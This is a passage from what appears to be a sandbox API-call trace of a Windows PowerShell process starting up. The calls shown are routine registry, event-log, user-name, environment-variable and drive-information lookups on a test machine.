phkResult=0x19e50c | out: phkResult=0x19e50c*=0x0) returned 0x2 [0050.782] RegOpenKeyExW (in: hKey=0x330, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e50c | out: phkResult=0x19e50c*=0x384) returned 0x0 [0050.782] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e50c | out: phkResult=0x19e50c*=0x0) returned 0x2 [0050.782] RegOpenKeyExW (in: hKey=0x330, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e50c | out: phkResult=0x19e50c*=0x388) returned 0x0 [0050.782] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e50c | out: phkResult=0x19e50c*=0x0) returned 0x2 [0050.782] RegOpenKeyExW (in: hKey=0x330, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e50c | out: phkResult=0x19e50c*=0x38c) returned 0x0 [0050.783] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e50c | out: phkResult=0x19e50c*=0x0) returned 0x2 [0050.783] RegOpenKeyExW (in: hKey=0x330, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e50c | out: phkResult=0x19e50c*=0x390) returned 0x0 [0050.783] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e50c | out: phkResult=0x19e50c*=0x0) returned 0x2 [0050.783] RegOpenKeyExW (in: hKey=0x330, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e50c | out: phkResult=0x19e50c*=0x394) returned 0x0 [0050.783] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e50c | out: phkResult=0x19e50c*=0x0) returned 0x2 [0050.783] RegOpenKeyExW (in: hKey=0x330, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e50c | out: phkResult=0x19e50c*=0x398) returned 0x0 [0050.784] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e50c | out: phkResult=0x19e50c*=0x0) returned 0x2 [0050.784] RegOpenKeyExW (in: hKey=0x330, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e50c | out: phkResult=0x19e50c*=0x39c) returned 0x0 [0050.784] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e50c | out: phkResult=0x19e50c*=0x0) returned 0x2 [0050.784] RegOpenKeyExW (in: hKey=0x330, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e50c | out: phkResult=0x19e50c*=0x3a0) returned 0x0 [0050.784] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e50c | out: phkResult=0x19e50c*=0x3a4) returned 0x0 [0050.784] RegCloseKey (hKey=0x3a4) returned 0x0 [0050.784] RegCloseKey (hKey=0x330) returned 0x0 [0050.784] RegCloseKey (hKey=0x3a0) returned 0x0 [0050.785] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e4dc | out: phkResult=0x19e4dc*=0x3a0) returned 0x0 [0050.785] RegQueryInfoKeyW (in: hKey=0x3a0, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x19e544, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x19e540, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x19e544*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x19e540*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.785] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x0, lpName=0x247300, lpcchName=0x19e560, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x19e560, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.785] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x1, lpName=0x247300, lpcchName=0x19e560, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x19e560, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.785] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x2, lpName=0x247300, lpcchName=0x19e560, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x19e560, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.785] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x3, lpName=0x247300, lpcchName=0x19e560, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x19e560, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.785] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x4, lpName=0x247300, lpcchName=0x19e560, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x19e560, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.786] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x5, lpName=0x247300, lpcchName=0x19e560, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x19e560, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.786] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x6, lpName=0x247300, lpcchName=0x19e560, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x19e560, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.786] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x7, lpName=0x247300, lpcchName=0x19e560, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x19e560, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.786] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x8, lpName=0x247300, lpcchName=0x19e560, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x19e560, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.786] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e50c | out: phkResult=0x19e50c*=0x330) returned 0x0 [0050.786] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e50c | out: phkResult=0x19e50c*=0x0) returned 0x2 [0050.787] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e50c | out: phkResult=0x19e50c*=0x3a4) returned 0x0 [0050.787] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e50c | out: phkResult=0x19e50c*=0x0) returned 0x2 [0050.787] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e50c | out: phkResult=0x19e50c*=0x3a8) returned 0x0 [0050.787] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e50c | out: phkResult=0x19e50c*=0x0) returned 0x2 [0050.787] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e50c | out: phkResult=0x19e50c*=0x3ac) returned 0x0 [0050.787] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e50c | out: phkResult=0x19e50c*=0x0) returned 0x2 [0050.788] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e50c | out: phkResult=0x19e50c*=0x3b0) returned 0x0 [0050.788] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e50c | out: phkResult=0x19e50c*=0x0) returned 0x2 [0050.788] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e50c | out: phkResult=0x19e50c*=0x3b4) returned 0x0 [0050.788] RegOpenKeyExW (in: hKey=0x3b4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e50c | out: phkResult=0x19e50c*=0x0) returned 0x2 [0050.788] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e50c | out: phkResult=0x19e50c*=0x3b8) returned 0x0 [0050.788] RegOpenKeyExW (in: hKey=0x3b8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e50c | out: phkResult=0x19e50c*=0x0) returned 0x2 [0050.788] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e50c | out: phkResult=0x19e50c*=0x3bc) returned 0x0 [0050.789] RegOpenKeyExW (in: hKey=0x3bc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e50c | out: phkResult=0x19e50c*=0x0) returned 0x2 [0050.789] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e50c | out: phkResult=0x19e50c*=0x3c0) returned 0x0 [0050.789] RegOpenKeyExW (in: hKey=0x3c0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e50c | out: phkResult=0x19e50c*=0x3c4) returned 0x0 [0050.789] RegCloseKey (hKey=0x3c4) returned 0x0 [0050.789] RegCloseKey (hKey=0x3a0) returned 0x0 [0050.790] RegCloseKey (hKey=0x3c0) returned 0x0 [0050.790] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e4d0 | out: phkResult=0x19e4d0*=0x3c0) returned 0x0 [0050.790] RegQueryInfoKeyW (in: hKey=0x3c0, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x19e538, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x19e534, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x19e538*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x19e534*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.790] RegEnumKeyExW (in: hKey=0x3c0, dwIndex=0x0, lpName=0x247300, lpcchName=0x19e554, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x19e554, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.790] RegEnumKeyExW (in: hKey=0x3c0, dwIndex=0x1, lpName=0x247300, lpcchName=0x19e554, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x19e554, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.791] RegEnumKeyExW (in: hKey=0x3c0, dwIndex=0x2, lpName=0x247300, lpcchName=0x19e554, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x19e554, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.791] RegEnumKeyExW (in: hKey=0x3c0, dwIndex=0x3, lpName=0x247300, lpcchName=0x19e554, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x19e554, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.791] RegEnumKeyExW (in: hKey=0x3c0, dwIndex=0x4, lpName=0x247300, lpcchName=0x19e554, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x19e554, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.791] RegEnumKeyExW (in: hKey=0x3c0, dwIndex=0x5, lpName=0x247300, lpcchName=0x19e554, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x19e554, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.791] RegEnumKeyExW (in: hKey=0x3c0, dwIndex=0x6, lpName=0x247300, lpcchName=0x19e554, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x19e554, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.791] RegEnumKeyExW (in: hKey=0x3c0, dwIndex=0x7, lpName=0x247300, lpcchName=0x19e554, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x19e554, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.791] RegEnumKeyExW (in: hKey=0x3c0, dwIndex=0x8, lpName=0x247300, lpcchName=0x19e554, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x19e554, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.791] RegOpenKeyExW (in: hKey=0x3c0, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e500 | out: phkResult=0x19e500*=0x3a0) returned 0x0 [0050.792] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e500 | out: phkResult=0x19e500*=0x0) returned 0x2 [0050.792] RegOpenKeyExW (in: hKey=0x3c0, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e500 | out: phkResult=0x19e500*=0x3c4) returned 0x0 [0050.792] RegOpenKeyExW (in: hKey=0x3c4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e500 | out: phkResult=0x19e500*=0x0) returned 0x2 [0050.792] RegOpenKeyExW (in: hKey=0x3c0, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e500 | out: phkResult=0x19e500*=0x3c8) returned 0x0 [0050.792] RegOpenKeyExW (in: hKey=0x3c8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e500 | out: phkResult=0x19e500*=0x0) returned 0x2 [0050.792] RegOpenKeyExW (in: hKey=0x3c0, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e500 | out: phkResult=0x19e500*=0x3cc) returned 0x0 [0050.792] RegOpenKeyExW (in: hKey=0x3cc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e500 | out: phkResult=0x19e500*=0x0) returned 0x2 [0050.793] RegOpenKeyExW (in: hKey=0x3c0, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e500 | out: phkResult=0x19e500*=0x3d0) returned 0x0 [0050.793] RegOpenKeyExW (in: hKey=0x3d0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e500 | out: phkResult=0x19e500*=0x0) returned 0x2 [0050.793] RegOpenKeyExW (in: hKey=0x3c0, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e500 | out: phkResult=0x19e500*=0x3d4) returned 0x0 [0050.793] RegOpenKeyExW (in: hKey=0x3d4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e500 | out: phkResult=0x19e500*=0x0) returned 0x2 [0050.793] RegOpenKeyExW (in: hKey=0x3c0, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e500 | out: phkResult=0x19e500*=0x3d8) returned 0x0 [0050.793] RegOpenKeyExW (in: hKey=0x3d8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e500 | out: phkResult=0x19e500*=0x0) returned 0x2 [0050.793] RegOpenKeyExW (in: hKey=0x3c0, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e500 | out: phkResult=0x19e500*=0x3dc) returned 0x0 [0050.794] RegOpenKeyExW (in: hKey=0x3dc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e500 | out: phkResult=0x19e500*=0x0) returned 0x2 [0050.794] RegOpenKeyExW (in: hKey=0x3c0, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e500 | out: phkResult=0x19e500*=0x3e0) returned 0x0 [0050.794] RegOpenKeyExW (in: hKey=0x3e0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e500 | out: phkResult=0x19e500*=0x3e4) returned 0x0 [0050.794] RegCloseKey (hKey=0x3e4) returned 0x0 [0050.794] RegCloseKey (hKey=0x3c0) returned 0x0 [0050.794] RegCloseKey (hKey=0x3e0) returned 0x0 [0050.798] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x4aa0004 [0050.801] GetLastError () returned 0x0 [0050.803] ReportEventW (hEventLog=0x4aa0004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x351de14*="WSMan", lpRawData=0x351dcbc) returned 1 [0050.821] GetLastError () returned 0x0 [0050.822] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.822] GetLastError () returned 0xcb [0050.823] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e074, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.823] GetLastError () returned 0xcb [0050.823] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e024, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.823] GetLastError () returned 0xcb [0050.823] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e024, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.823] GetLastError () returned 0xcb [0050.823] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x247ac0, nSize=0x19e674 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x19e674) returned 0x1 [0050.823] GetLastError () returned 0xcb [0050.823] GetUserNameW (in: lpBuffer=0x247300, pcbBuffer=0x19e67c | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x19e67c) returned 1 [0050.824] ReportEventW (hEventLog=0x4aa0004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3521cf0*="Alias", lpRawData=0x3521bac) returned 1 [0050.824] GetLastError () returned 0x0 [0050.825] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.825] GetLastError () returned 0xcb [0050.825] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e074, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.825] GetLastError () returned 0xcb [0050.825] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e024, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.826] GetLastError () returned 0xcb [0050.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e024, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.826] GetLastError () returned 0xcb [0050.826] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x247ac0, nSize=0x19e674 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x19e674) returned 0x1 [0050.826] GetLastError () returned 0xcb [0050.826] GetUserNameW (in: lpBuffer=0x247300, pcbBuffer=0x19e67c | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x19e67c) returned 1 [0050.826] ReportEventW (hEventLog=0x4aa0004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3525c84*="Environment", lpRawData=0x3525b40) returned 1 [0050.827] GetLastError () returned 0x0 [0050.828] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.828] GetLastError () returned 0xcb [0050.828] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="C:") returned 0x2 [0050.828] GetLastError () returned 0xcb [0050.828] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b [0050.828] GetLastError () returned 0xcb [0050.829] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x19e1a4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0050.829] GetLastError () returned 0xcb [0050.829] SetErrorMode (uMode=0x1) returned 0x1 [0050.829] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x19e624 | out: lpFileInformation=0x19e624*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0050.829] GetLastError () returned 0xcb [0050.829] SetErrorMode (uMode=0x1) returned 0x1 [0050.832] GetLogicalDrives () returned 0x4 [0050.832] GetLastError () returned 0xcb [0050.833] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x19e0c8, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0050.833] GetLastError () returned 0xcb [0050.834] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0050.834] GetLastError () returned 0xcb [0050.834] SetErrorMode (uMode=0x1) returned 0x1 [0050.835] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x247400, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x19e5f0, lpMaximumComponentLength=0x19e5ec, lpFileSystemFlags=0x19e5e8, lpFileSystemNameBuffer=0x247300, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x19e5f0*=0x9c354b42, lpMaximumComponentLength=0x19e5ec*=0xff, lpFileSystemFlags=0x19e5e8*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0050.836] GetLastError () returned 0xcb [0050.836] SetErrorMode (uMode=0x1) returned 0x1 [0050.836] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0050.836] GetLastError () returned 0xcb [0050.836] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x19e150, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0050.836] GetLastError () returned 0xcb [0050.836] SetErrorMode (uMode=0x1) returned 0x1 [0050.836] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x3526ebc | out: lpFileInformation=0x3526ebc*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0050.836] GetLastError () returned 0xcb [0050.836] SetErrorMode (uMode=0x1) returned 0x1 [0050.836] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x19e150, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0050.836] GetLastError () returned 0xcb [0050.836] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x19e0dc, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0050.836] GetLastError () returned 0xcb [0050.836] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0050.836] GetLastError () returned 0xcb [0050.838] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x19e098, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0050.838] GetLastError () returned 0xcb [0050.838] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0050.839] GetLastError () returned 0xcb [0050.839] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x19e0a0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0050.839] GetLastError () returned 0xcb [0050.839] SetErrorMode (uMode=0x1) returned 0x1 [0050.839] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x3527b14 | out: lpFileInformation=0x3527b14*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, 